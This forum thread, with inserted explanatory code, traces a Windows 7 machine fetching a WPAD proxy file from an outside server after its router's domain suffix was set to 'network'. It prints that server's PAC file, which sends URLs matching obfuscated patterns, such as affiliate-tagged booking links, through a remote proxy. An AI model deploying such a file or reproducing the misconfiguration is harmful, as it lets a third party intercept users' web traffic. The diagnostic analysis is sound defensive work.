Windows 7 keeps downloading file from 144.76.184.43?

2 replies to this topic

#1 OpenFerret
Posted 13 January 2016 - 07:11 PM

Hi all,

Been alerted by a Snort rule (ET Zbot download config) that my Windows 7 box keeps connecting to 144.76.184.43 on port 80 and trying to download a file called wpad.dat.

You can see the file yourself by downloading it from 144.76.184.43/wpad.dat

The file contains:

// WpadBlock.com project
// Testing regular expressions
// Each clause below: one or more URL patterns to match, minus exclusion patterns
function FindProxyForURL(url, host) {
	if (
		( shExpMatch(url, "*//s?clic??a*pres?.c*/e/*") && !shExpMatch(url, "*aQNVZ?AU*") ) ||
		( shExpMatch(url, "*:/?e?or?.?w/*") && !shExpMatch(url, "*OZ?2?*") ) ||
		( shExpMatch(url, "*t*p:*sh*u*.t*te*eg*st*r") && !shExpMatch(url, "*new*") && !shExpMatch(url, "*ac*ru*s*") ) ||
		( shExpMatch(url, "h?t*/*w.b?*k?ng.c*m/*aid*") && !shExpMatch(url, "*3646?2*") && !shExpMatch(url, "*/aclk*") && !shExpMatch(url, "*noredir*") && !shExpMatch(url, "*gclid*") ) ||
		( shExpMatch(url, "*ttp:/*w?pl*s5?0.*/") || shExpMatch(url, "ht*w?pl*s5?0.*/*id=*") ) ||
		( shExpMatch(url, "*w?ce?*o.p?/C*ent*js*bun*e/b*/js*") ) ||
		( shExpMatch(url, "*t*ff?l*.be*-*-ho*.c*/p*ss*/*.as*bta*a_*") && !shExpMatch(url, "*a_7?59?b*") ) ||
		( shExpMatch(url, "*.?rs?c?m/??/") || shExpMatch(url, "*.?rs?d??we?3/") || shExpMatch(url, "*.?rs?c?m/we?3/") || ( shExpMatch(url, "*.hr??*hot*?do*off*") && !shExpMatch(url, "*10?35?2?39*") ) ) ||
		( shExpMatch(url, "*tt*/g?.s*le?m*i?.p?/*_*=*") && !shExpMatch(url, "*d=1?90*") ) ||
		( shExpMatch(url, "*p://af?.?pti*ar?.c??/*") && !shExpMatch(url, "*8?67*") ) ||
		( shExpMatch(url, "*p:*/w*.co?p*ial?a*ann?r*p*ef*") && !shExpMatch(url, "*75?6*6*") )
	) return "PROXY 144.76.184.43:80";
	return "DIRECT";
}

Can anyone tell me if this is an actual trojan? I've used some of the Sysinternals suite to see what program is doing this and it's svchost. Even when I block access to 144.76.184.43 with my firewall, svchost keeps trying different local ports methodically to get the file.


Edited by hamluis, 13 January 2016 - 08:16 PM.
Moved from Win 7 to Am I Infected - Hamluis.
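To see what the posted FindProxyForURL actually does with a request, here is an added example in JavaScript (not from the post, and not code from the WpadBlock.com project): a small PAC evaluator. shExpMatch() is re-implemented, the match/exclude patterns are transcribed from the wpad.dat above, and the sample URLs are constructed. Only the booking.com clause is exercised, because the other patterns are too obfuscated to build a matching URL without guessing hostnames; the case-sensitive matching is an assumption about the PAC engine, not a verified WinHTTP behaviour.

```javascript
// Added example, not part of the forum post: a minimal PAC evaluator that
// re-implements shExpMatch() and runs the clauses transcribed from the posted
// wpad.dat over constructed URLs, to show which requests would be sent
// through 144.76.184.43.

// shExpMatch(): shell-style globbing, "*" = any run of characters, "?" = one.
// Case handling differs between PAC engines; this version is case-sensitive
// (assumption, not verified against WinHTTP).
function shExpMatch(str, pattern) {
  const re = Array.from(pattern, (c) =>
    c === "*" ? ".*" : c === "?" ? "." : c.replace(/[.+^${}()|[\]\\]/g, "\\$&")
  ).join("");
  return new RegExp("^" + re + "$").test(str);
}

// The posted file as data: a URL is proxied when any "match" pattern hits and
// none of that clause's "exclude" patterns do. The original's one combined
// OR-clause is split into two rows here; the logic is unchanged.
const CLAUSES = [
  { match: ["*//s?clic??a*pres?.c*/e/*"], exclude: ["*aQNVZ?AU*"] },
  { match: ["*:/?e?or?.?w/*"], exclude: ["*OZ?2?*"] },
  { match: ["*t*p:*sh*u*.t*te*eg*st*r"], exclude: ["*new*", "*ac*ru*s*"] },
  { match: ["h?t*/*w.b?*k?ng.c*m/*aid*"],
    exclude: ["*3646?2*", "*/aclk*", "*noredir*", "*gclid*"] },
  { match: ["*ttp:/*w?pl*s5?0.*/", "ht*w?pl*s5?0.*/*id=*"], exclude: [] },
  { match: ["*w?ce?*o.p?/C*ent*js*bun*e/b*/js*"], exclude: [] },
  { match: ["*t*ff?l*.be*-*-ho*.c*/p*ss*/*.as*bta*a_*"], exclude: ["*a_7?59?b*"] },
  { match: ["*.?rs?c?m/??/", "*.?rs?d??we?3/", "*.?rs?c?m/we?3/"], exclude: [] },
  { match: ["*.hr??*hot*?do*off*"], exclude: ["*10?35?2?39*"] },
  { match: ["*tt*/g?.s*le?m*i?.p?/*_*=*"], exclude: ["*d=1?90*"] },
  { match: ["*p://af?.?pti*ar?.c??/*"], exclude: ["*8?67*"] },
  { match: ["*p:*/w*.co?p*ial?a*ann?r*p*ef*"], exclude: ["*75?6*6*"] },
];

const PROXY = "PROXY 144.76.184.43:80";

// Same decision the posted file makes; "host" is unused, as in the original.
function FindProxyForURL(url, host) {
  const proxied = CLAUSES.some(
    (c) =>
      c.match.some((p) => shExpMatch(url, p)) &&
      !c.exclude.some((p) => shExpMatch(url, p))
  );
  return proxied ? PROXY : "DIRECT";
}

// Constructed sample URLs (illustrative only, not captured traffic).
const SAMPLES = [
  "http://www.booking.com/hotel/gb/example.html?aid=123456",           // affiliate id present
  "http://www.booking.com/hotel/gb/example.html?aid=123456&gclid=abc", // exclusion pattern hits
  "http://www.booking.com/hotel/gb/example.html",                      // no affiliate id
  "http://www.example.org/",                                           // unrelated site
];

// Returns one {url, route} record per URL so the decisions can be inspected.
function classify(urls) {
  return urls.map((u) => ({ url: u, route: FindProxyForURL(u, new URL(u).hostname) }));
}

for (const r of classify(SAMPLES)) console.log(r.route.padEnd(24), r.url);
```

Run it with node. For the constructed URLs only the booking.com link carrying an aid parameter comes back as PROXY 144.76.184.43:80; add a gclid (or any other exclusion pattern) and the same file answers DIRECT, and the unrelated URL is DIRECT as well. So the file is not a blanket proxy: everything falls through to DIRECT except requests matching these wildcard patterns, which is consistent with the poster seeing nothing obviously broken on the machine. Confirm the shExpMatch case behaviour against the client you actually care about before relying on a result like this.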

#2 OpenFerret
Posted 14 January 2016 - 08:28 AM

So, I've disabled the WinHTTP Web Proxy Discovery Service and this has stopped the requests, but pinging wpad in the cmd line still directs to 144.76.184.43...

I'm hoping that a reboot when I get home will clear the wpad and that I'll no longer keep going to some server in Germany to get it.

If anyone can look at the above and tell me what it is doing and why, I would be interested to see.



#3 OpenFerret
Posted 14 January 2016 - 10:01 AM

Ok, cancel my last!

I've resolved the issue and proved to myself yet again what a muppet I can be...

So... the pfSense router thought its domain name was 'network' and my Windows 7 box was set up to look for proxy settings for some reason?

As a result, looking for a legitimate wpad file asked my DNS server (Google at 8.8.8.8) where it could find wpad.network, which turns out to be 144.76.184.43.

Then Windows does what it should and submits a GET request for a wpad.dat file, which is returned as that file at the top of this post from someone's network...

... and then Snort kicks off as it meets certain criteria.

Moral of the story, don't set your domain name to a TLD... Make it unique (#networking101).
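The chain described in this post, as an added JavaScript example (not from the post): a model of the DNS half of WPAD discovery that shows how a single-label suffix such as "network" turns the wpad lookup into a query under a public TLD. The candidate-name logic is a simplification of the devolution in the WPAD draft (strip the leftmost label and retry, never asking for wpad.<tld> when there are two or more labels), the DHCP option 252 step that real clients try first is omitted, and the resolver table is constructed; its one real entry, wpad.network resolving to 144.76.184.43, is what the poster observed.

```javascript
// Added example, not part of the forum post: a simplified model of WPAD DNS
// discovery plus a check for the misconfiguration this thread ends on.

// Candidate names for each suffix in the search list. Multi-label suffixes are
// devolved one label at a time but never below two labels ("a.b.c" gives
// wpad.a.b.c and wpad.b.c, not wpad.c). A single-label suffix has nothing to
// devolve, so it is queried as-is: that is exactly the "network" case.
// DHCP option 252, which clients try before DNS, is omitted here.
function wpadCandidates(suffixSearchList) {
  const out = [];
  for (const suffix of suffixSearchList) {
    const labels = suffix.toLowerCase().split(".").filter(Boolean);
    const tries = labels.length === 1 ? [labels] : [];
    for (let i = 0; i + 2 <= labels.length; i++) tries.push(labels.slice(i));
    for (const l of tries) {
      out.push({
        fqdn: "wpad." + l.join("."),
        // One label means the name sits directly under a TLD. If that label is
        // a delegated gTLD (".network" is one), whoever registered wpad.<tld>
        // answers the query, not your own DNS.
        leavesLocalControl: l.length === 1,
      });
    }
  }
  return out;
}

// Constructed resolver: only names in this table resolve. The wpad.network
// entry is the resolution reported in the post; nothing else is real data.
const RESOLVER = {
  "wpad.network": "144.76.184.43",
};

// First candidate that resolves wins; the client then fetches
// http://<name>/wpad.dat from it. null means the client falls back to DIRECT.
function discover(suffixSearchList, resolver = RESOLVER) {
  for (const c of wpadCandidates(suffixSearchList)) {
    const ip = resolver[c.fqdn];
    if (ip) {
      return {
        fqdn: c.fqdn,
        ip,
        url: "http://" + c.fqdn + "/wpad.dat",
        leavesLocalControl: c.leavesLocalControl,
      };
    }
  }
  return null;
}

// Demo: the poster's misconfigured suffix versus a hypothetical private one.
for (const list of [["network"], ["home.lan"], ["corp.example.com"]]) {
  const r = discover(list);
  console.log(
    JSON.stringify(list).padEnd(22),
    r ? `${r.url} -> ${r.ip}${r.leavesLocalControl ? "  (outside your DNS zone!)" : ""}`
      : "no wpad host resolved -> DIRECT"
  );
}
```

With the suffix set to "network", discover() returns wpad.network at 144.76.184.43 and flags it as leaving local control; with a made-up private suffix like home.lan nothing resolves and the client goes DIRECT. As a check on your own machine, put the DNS suffix search list from ipconfig /all through wpadCandidates() and treat any entry with leavesLocalControl set as the same bug the poster had.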
